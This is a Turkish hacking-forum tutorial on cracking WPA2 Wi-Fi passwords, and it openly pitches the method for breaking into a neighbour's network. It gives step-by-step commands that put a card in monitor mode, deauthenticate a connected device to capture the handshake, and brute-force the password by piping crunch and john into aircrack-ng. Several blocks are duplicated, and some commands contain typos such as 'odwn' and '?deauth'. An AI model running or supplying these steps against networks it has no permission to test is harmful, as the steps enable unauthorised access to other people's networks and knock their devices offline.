Selam Arkadaşlar bugün sizlere Wifi Şifreleri hacklerken nasıl çok büyük wordlistleri Linux'a indirmeden çalıştırabiliriz bunun hakkında bahsedeceğim. İyi okumalar...
Hepimiz ilk hack işlemlerine başladığımızda aklımızda komşu wifi şifresini hacklemek olur.Bunu ilk başlayan arkadaşlar özellikle çok dener ancak çoğumuz Wpa2 Korumalı bir ağ gördüğümüz zaman maalesef ki bu işlemi yarıda bırakırız, çünkü oluşturmak istediğimiz password listeleri oldukça büyük olması ve Sanal makinemize indiremememiz bunun başlıca etkisidir. Bu yazımda olabildiğince sizlere geniş ve hatalara yer vererek anlatacağım en baştan itibaren o yüzden biraz uzun olacak. Çayınızı ve kahvenizi aldıysanız başlayalım.
Konu da anlatılan içerik tamamen insanların bilinçlenmesi ve bilgi sahibi olması amacıyla paylaşılmıştır. Yapacağınız tüm aktiviteler ve oluşabilecek tüm problemler kişinin kendi sorumluluğundadır.
Yapılan işlemler süresince kullandığım aygıtlar ve uygulamalar aşağıdadır.
1.Tp-Link Wn7222n Usb Wifi Card
2.Kali&Linux 2020.3, 5.7.0 Çekirdek sürümü.
3. WmWare Workstation 16 Pro
4.airodump
5.crunch
6.aircrack
1.Tp-Link Wn7222n Usb Wifi Card
2.Kali&Linux 2020.3, 5.7.0 Çekirdek sürümü.
3. WmWare Workstation 16 Pro
4.airodump
5.crunch
6.aircrack
Öncelikle saldırı yapmak istediğimiz ağı seçmek ve handshake yakalamak için Usb Wifi kartımızı monitör moda alıyoruz.
Kod:
sudo airmon-ng check kill
Kod:
sudo ip link set wlan0 down
Kod:
sudo iw dev wlan0 set type monitor
Kod:
sudo ifconfig wlan0 up
Kod:
sudo iwconfig
sudo airmon-ng check kill
Kod:
sudo ip link set wlan0 down
Kod:
sudo iw dev wlan0 set type monitor
Kod:
sudo ifconfig wlan0 up
Kod:
sudo iwconfig
Gördüğünüz üzere monitör moda geçmişiz. Sırada hedef ağı tespit etmek ve bu ağda bağlı birisini kullanarak Handshake yakalamalıyız. Ağ kalabalık bir yerdeki açık ağ ise veya bağlanan kişi sayısı fazla ise ağa birisinin bağlanmasını bekleyerek de handshake yakalayabiliriz. Burada biz kendimiz hadnshake yakalayacağız ağa bağlı bir cihazı ağdan düşürerek.
Gördüğünüz üzere monitör moda geçtik şimdi sırada airodump çalıştırarak çevremizdeki ağlara bakacağız.
Gördüğünüz üzere monitör moda geçtik şimdi sırada airodump çalıştırarak çevremizdeki ağlara bakacağız.
Kod:
airodump-ng wlan0
airodump-ng wlan0
Çevredeki ağları gördük ve hedef ağımı gördüğüm an( ctrl+c ) yaparak terminalimi durdurdum. Şimdi hedefimiz olan ağa kimlerin bağlandığı görmek için aşağıdaki komutu yazıyoruz.
Kod:
airodump-ng --bssid (HEDEF MAC ADRESİ) --channel 6 --write handshake-test wlan0
[CENTER]--channel adresleri her Modem için farklı kanalda olabilir resimlerde gördüğünüz üzere benim modemim 6. Kanalada yayın yapmaktadır.

Resimde gördüğünüz üzere artık ağa bağlı cihazları görebilmekteyiz. Şimdi ağdaki cihazlardan birisini birkaç saniyeliğine ağdan düşüreceğiz ve ardından ağa bağlandığı zaman handshake yakalayacağız.
Bunun için yeni bir terminal açıyoruz ve seçtiğimiz hedefi yazıyoruz.
Kod:
aireplay-ng ?deauth 10 -a hedef modem mac adresi -c hedef bilgisayar mac adresi wlan0

Resimde gördüğünüz üzere Deauth paketlerimiz yollandı ve Hedef ağdan düştü ve tekrar bağlandığında ağa bize lazım olan handshake yakalayacağız. Handshake yakalamış durumdayız.Şimdi ağa saldırı düzenleme vakti ilk önce küçük bir wordlist ile saldırı yapacağız ağ kendi ağım olduğu için şifresini Wordlistin bulacağı şekilde ayarladım. Siz burada hedef ağ hakkında tahminlerinizi yazabilirsiniz ancak uzun bir şifre ise , dosyamızın boyutu oldukça büyük olacak fakat sizlere dediğim gibi o şekilde de saldırı yapacağız yazımın ilerleyen kısımlarında. Şimdi şifremiz için bir wordlist oluşturalım.
Kod:
crunch 8 9 svr123 -o wordlist
crunch 8 9 svr123 -o wordlist

Kodumuzu yazınca gördüğünüz üzere 110 mb boyutunda bir şifre oluştu.( Crunch kullanımı için sizlere bahsetmeyeceğim formumuzda oldukça yeterli bilgiler bulunmakta bu linke tıklayarak iyice öğrenebilirsiniz. https://www.turkhackteam.org/linux/1...olusturma.html ) Wordlistimizi oluşturduk ancak nereye çıktı vereceğini söylemediğimiz için dosyamız Root klasörümüzün içine kaydedildi. Handshake adresimiz de aynı zamanda root dosyamızın içine kayıt edildi.
Sırada şifreyi kırmak var şifreyi kırmak için aşağıdaki kodu yazıyoruz.
Kod:
aircrack-ng handshake-test-01.cap -w wordlist

Gördüğünüz üzere wifi şifresini kırma işlemimiz bitti. Bu kadar kolay kırılmasının sebebi de benim şifreyi bilmem ve buna bağlı olarak dar aralıkta yazmış olmam şifreyi.
Peki gerçek yaşantımızda wifi şiresini kırmak istediğimiz zaman nasıl Telabaytlarca büyüklüğündeki şifreleri indirmeden kullanabiliriz bunun göstereceğim. Yine crunch kullanarak kodumuzu yazalım. Bu sefer 8 haneli tüm kombinasyonları deneyen bir password listesi oluşturuyoruz boyutunu düşündüğümüz zaman oldukça yüksek boyutlu olacaktır.
Peki gerçek yaşantımızda wifi şiresini kırmak istediğimiz zaman nasıl Telabaytlarca büyüklüğündeki şifreleri indirmeden kullanabiliriz bunun göstereceğim. Yine crunch kullanarak kodumuzu yazalım. Bu sefer 8 haneli tüm kombinasyonları deneyen bir password listesi oluşturuyoruz boyutunu düşündüğümüz zaman oldukça yüksek boyutlu olacaktır.
Kod:
crunch 8 8 | aircrack-ng -w - -b (şifresini kırmak istediğiniz modemin mac adresi) -h handshake-test-01.cap
Resimde gördüğünüz üzere şifreyi kırma işlemine başladık ve wordlist dosyası bilgisayarımızda yok.
Evet burada diyeceksiniz bu şifreyi denemek ve doğru wifi şifresini bulmak belki günlerimizi alacaktır peki biz ne yapacağız, bu durumda şifre kırma işlemimizi istediğimiz zaman başlatmak ve durdurmak için john isimli uygulamamızı kullanacağız.
Kod:
crunch 8 8 | john ?stdin ?sessions=lars ?stdout | aircrack-ng -w - -b (şifresini kırmak istediğiniz modemin mac adresi) -h handshake-test-01.cap
crunch 8 8 | aircrack-ng -w - -b (şifresini kırmak istediğiniz modemin mac adresi) -h handshake-test-01.cap
Resimde gördüğünüz üzere şifreyi kırma işlemine başladık ve wordlist dosyası bilgisayarımızda yok.
Evet burada diyeceksiniz bu şifreyi denemek ve doğru wifi şifresini bulmak belki günlerimizi alacaktır peki biz ne yapacağız, bu durumda şifre kırma işlemimizi istediğimiz zaman başlatmak ve durdurmak için john isimli uygulamamızı kullanacağız.
Kod:
crunch 8 8 | john ?stdin ?sessions=lars ?stdout | aircrack-ng -w - -b (şifresini kırmak istediğiniz modemin mac adresi) -h handshake-test-01.cap

Resimde gördüğünüz üzere şifreyi denemeye başlıyor.


Şifre işleminde bir süre bekledikten sonra gördüğünüz üzere aaahnvt de duraklattım duraklatırken ctrl+c yapmanız yeterlidir. Şimdi aşağıdaki kodu yazarak tekrardan başlatıyoruz ve göreceğiz en son kaldığımız yerden mi devam edecek?
Kod:
crunch 8 8 | john --restore=lars | aircrack-ng -w - -b şifresini kırmak istediğiniz modemin mac adresi -h handshake-test-01.cap

Resimde gördüğünüz üzere işlemimiz tekrardan başladı ve son kaldığımız yerden devam ediyor.
İşlemler sırasında kullandığım tüm kodlarıma buradan ulaşabilirsiniz:
İşlemler sırasında wifi adını , mac adresini ve parolayı gizledim kişisel bilgiler yer aldığı için.
Hepinize teşekkür ederim arkadaşlar sorularınız olursa yazmaktan çekinmeyin. Hepinize İyi Forumlar dilerim?
Kod:
1. sudo airmon-ng check kill
2. sudo ip link set wlan0 odwn
3. sudo iw dev wlan0 set type monitör
4. sudo ifconfig wlan0 up
5. sudo iwconfig
6. sudo -i
7. airodump-ng --bssid hedef modem mac adresi --channel 6 --write handshake-test wlan0
8. aireplay-ng --deauth 10 -a hedef modem mac -c hedef cihaz mac adresi wlan0
9. aircrack-ng handshake-test-01.cap -w wordlist
İşlemler sırasında kullandığım tüm kodlarıma buradan ulaşabilirsiniz:
İşlemler sırasında wifi adını , mac adresini ve parolayı gizledim kişisel bilgiler yer aldığı için.
Hepinize teşekkür ederim arkadaşlar sorularınız olursa yazmaktan çekinmeyin. Hepinize İyi Forumlar dilerim?
Kod:
1. sudo airmon-ng check kill
2. sudo ip link set wlan0 odwn
3. sudo iw dev wlan0 set type monitör
4. sudo ifconfig wlan0 up
5. sudo iwconfig
6. sudo -i
7. airodump-ng --bssid hedef modem mac adresi --channel 6 --write handshake-test wlan0
8. aireplay-ng --deauth 10 -a hedef modem mac -c hedef cihaz mac adresi wlan0
9. aircrack-ng handshake-test-01.cap -w wordlist